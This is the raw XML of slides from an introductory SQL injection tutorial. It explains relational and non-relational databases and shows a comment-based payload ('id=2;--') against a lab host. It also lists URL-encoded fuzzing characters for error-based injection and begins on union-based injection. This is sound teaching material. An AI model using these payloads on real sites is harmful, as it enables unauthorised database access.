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8A00D55-D434-4B5E-AC01-F8CCF657DA85}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>26/06/2022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31626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A00D55-D434-4B5E-AC01-F8CCF657DA85}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>26/06/2022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83727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A00D55-D434-4B5E-AC01-F8CCF657DA85}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>26/06/2022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33823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A00D55-D434-4B5E-AC01-F8CCF657DA85}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>26/06/2022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21049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00D55-D434-4B5E-AC01-F8CCF657DA85}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>26/06/2022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394845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8A00D55-D434-4B5E-AC01-F8CCF657DA85}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>26/06/2022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224860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8A00D55-D434-4B5E-AC01-F8CCF657DA85}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>26/06/2022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358578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8A00D55-D434-4B5E-AC01-F8CCF657DA85}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>26/06/2022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65999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00D55-D434-4B5E-AC01-F8CCF657DA85}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>26/06/2022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40144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00D55-D434-4B5E-AC01-F8CCF657DA85}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>26/06/2022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106605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00D55-D434-4B5E-AC01-F8CCF657DA85}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>26/06/2022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50BBF5-F165-4F1C-9F60-E8FE37491B09}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="314994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00D55-D434-4B5E-AC01-F8CCF657DA85}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>26/06/2022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0BBF5-F165-4F1C-9F60-E8FE37491B09}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="403827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entestmonkey.net/cheat-sheet/sql-injection/informix-sql-injection-cheat-she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ebsite.thm/blog?id=2;--" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://website.thm/blog?id=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dureka.co/blog/what-is-a-database/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.edureka.co/blog/sql-basic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GB" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://pentestmonkey.net/cheat-sheet/sql-injection/informix-sql-injection-cheat-sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" u="sng" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t> (Structured Query Language) Injection, mostly referred to as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>, is an attack on a web application database server that causes malicious queries </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>executed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" u="sng" dirty="0"/>
              <a:t>database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t> is a way of electronically storing collections of data in an organised manner. A database is controlled by a DBMS which is an acronym for  Database Management System, DBMS's fall into two camps </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
              <a:t>Relational</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>Non-Relational.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
              <a:t>Relational </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>Vs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
              <a:t> Non-Relational Databases:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" u="sng" dirty="0"/>
              <a:t>A relational database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>, stores information in tables and often the tables have shared information between them, they use columns to specify and define the data being stored and rows to actually store the data. The tables will often contain a column that has a unique ID (primary key) which will then be used in other tables to reference it and cause a relationship between the tables, hence the name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
              <a:t>relational</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t> database.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" u="sng" dirty="0" smtClean="0"/>
              <a:t>Non-relational </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" u="sng" dirty="0"/>
              <a:t>databases </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>sometimes called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1"/>
              <a:t>NoSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t> on the other hand is any sort of database that doesn't use tables, columns and rows to store the data, a specific database layout doesn't need to be constructed so each row of data can contain different information which can give more flexibility over a relational database.  Some popular databases of this type are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1"/>
              <a:t>MongoDB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>, Cassandra and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1"/>
              <a:t>ElasticSearch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1340240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What is SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>The point wherein a web application using SQL can turn into SQL Injection is when user-provided data gets included in the SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>query.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t> 1.   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>website.thm/blog?id=1</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>From the URL above, you can see that the blog entry been selected comes from the id parameter in the query string. The web application needs to retrieve the article from the database and may use an SQL statement that looks something like the following</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
              <a:t>* from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>blog </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
              <a:t>where id=1 and private=0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>LIMIT= 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>From what you've learned in the previous task, you should be able to work out that the SQL statement above is looking in the blog table for an article with the id number of 1 and the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" u="sng" dirty="0"/>
              <a:t>private column set to 0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>, which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" u="sng" dirty="0"/>
              <a:t>means it's able to be viewed by the public </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>and limits </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>results to only one match</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>://website.thm/blog?id=2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>;--</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>would then, in turn, produce the SQL statement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>: SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>* from blog where id=2;-- and private=0 LIMIT 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
              <a:t>The semicolon in the URL signifies the end of the SQL statement, and the two dashes cause everything afterwards to be treated as a comment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>. By doing this, you're just, in fact, running the query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT * from blog where id=2;--</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3423249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How to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" u="sng" dirty="0" err="1"/>
              <a:t>Indentify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" u="sng" dirty="0"/>
              <a:t> Error Based SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" u="sng" dirty="0"/>
              <a:t>Step1:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>	Find </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>out </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" u="sng" dirty="0"/>
              <a:t>injection parameter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0"/>
              <a:t>fuzzing tools </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>manually.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>• Fuzz the application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>: Submit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>SQL-specific characters such as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>, and look for errors or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>	other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>anomalies</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Step2:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0"/>
              <a:t>	 Use Given below </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>payoad</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" u="sng" dirty="0" smtClean="0"/>
              <a:t>  Payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" u="sng" dirty="0" smtClean="0"/>
              <a:t>URL Encoded</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
              <a:t>' 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>		%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
              <a:t>27</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
              <a:t>          " </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>			%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
              <a:t>22</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
              <a:t>          # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>			%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
              <a:t>23</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
              <a:t>          ; 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>		%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
              <a:t>3B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
              <a:t>          ) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>			%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
              <a:t>29</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>If we </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>an error </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, there has </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>error based SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>injection and then, Use SQL Map for Automatic SQL Injection Pen-Testing / Manually Testing</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1183144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smtClean="0"/>
              <a:t>Exploiting/Find </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" u="sng" dirty="0"/>
              <a:t>Union-Based </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" u="sng" dirty="0" err="1" smtClean="0"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>There are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" u="sng" dirty="0"/>
              <a:t>two rules </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>for combining the result sets of two queries by using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0"/>
              <a:t>UNION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>• The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" u="sng" dirty="0"/>
              <a:t>number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t> and the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" u="sng" dirty="0"/>
              <a:t> order </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>of the columns </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" u="sng" dirty="0"/>
              <a:t>must be the same in all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" u="sng" dirty="0" smtClean="0"/>
              <a:t>queries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>• The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" u="sng" dirty="0"/>
              <a:t>data types </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>must be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>same</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0"/>
              <a:t>Step1:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>find out actual column number using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
